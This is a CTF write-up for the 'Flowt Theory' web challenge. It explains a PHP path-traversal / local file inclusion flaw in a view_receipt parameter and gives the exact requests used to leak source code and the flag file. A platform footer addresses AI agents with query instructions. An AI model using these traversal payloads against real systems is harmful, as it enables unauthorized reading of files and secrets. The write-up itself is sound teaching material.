> For the complete documentation index, see [llms.txt](https://lance-kenji.gitbook.io/me/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lance-kenji.gitbook.io/me/nullcon-hackim-ctf-goa-2026-writeups/misc/flowt-theory.md). # Flowt Theory **Category:** Web / Misc **Difficulty:** Easy/Medium #### 1. Challenge Overview The challenge presented a "BillSplitter Lite" web application. The application allows users to input names and expense amounts, which it then calculates to settle debts. The prompt mentioned an "administrative fee" of 0.01 that was somehow hidden in the "extremely advanced math" of the calculation. #### 2. Vulnerability Analysis **Initial Discovery** Upon visiting the site, I entered group expenses and clicked **"Calculate Group Total."** I noticed a **"View Log"** link next to each transaction. Clicking this link redirected me to a URL with a specific parameter: `?view_receipt=[filename]` **Identifying LFI** I suspected a Local File Inclusion (LFI) or Path Traversal vulnerability and tested it by attempting to access a directory. I received a revealing PHP error: `Notice: file_get_contents(): Read of 8192 bytes failed with errno=21 Is a directory in /var/www/html/index.php on line 82` This confirmed that the `view_receipt` parameter was being passed directly into `file_get_contents()`. I immediately used this to leak the application's source code: `http://52.59.124.14:5069/?view_receipt=../../index.php` **Source Code Analysis** The leaked code showed that every user gets a private directory based on their session ID. Inside that directory, a "secret" file is created: ```php $secret_name = "secret_" . $random_suffix; $real_flag = trim(file_get_contents('/flag.txt')); $content = "0.01\n" . $real_flag; file_put_contents($user_dir . $secret_name, $content); file_put_contents($flag_file_lock, $secret_name); // .lock stores the name ``` The "advanced math" was actually **PHP Type Juggling**. When the app sums up the totals, it uses `(float)$content`. Because the secret file starts with `0.01`, PHP converts the string `"0.01\nENO{flag}"` into the float `0.01`, effectively hiding the flag text from the UI but including the value in the "Vault Balance." #### 3. Developing the Exploit To find the flag, I needed to know the 8-character random suffix of the `secret_` file. The source code revealed that this filename is conveniently stored in a file called `.lock` within the user's directory. #### 4. The Solution Script No script was necessary; the exploitation was performed manually through the browser based on the discovery of the `.lock` file. 1. **Read the pointer file:** Access `?view_receipt=.lock` to find the randomized filename. 2. **Read the flag file:** Access `?view_receipt=[secret_filename_from_step_1]` to read the flag. #### 5. The Winning Payload **Request 1 (Finding the filename):** `http://52.59.124.14:5069/?view_receipt=.lock` **Response:** `secret_eEuAvCmX` **Request 2 (Extracting the flag):** `http://52.59.124.14:5069/?view_receipt=secret_eEuAvCmX` #### 6. Result ```plaintext Viewing: secret_eEuAvCmX 0.01 ENO{f10a71ng_p01n7_pr3c1510n_15_n07_y0ur_fr13nd} ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lance-kenji.gitbook.io/me/nullcon-hackim-ctf-goa-2026-writeups/misc/flowt-theory.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.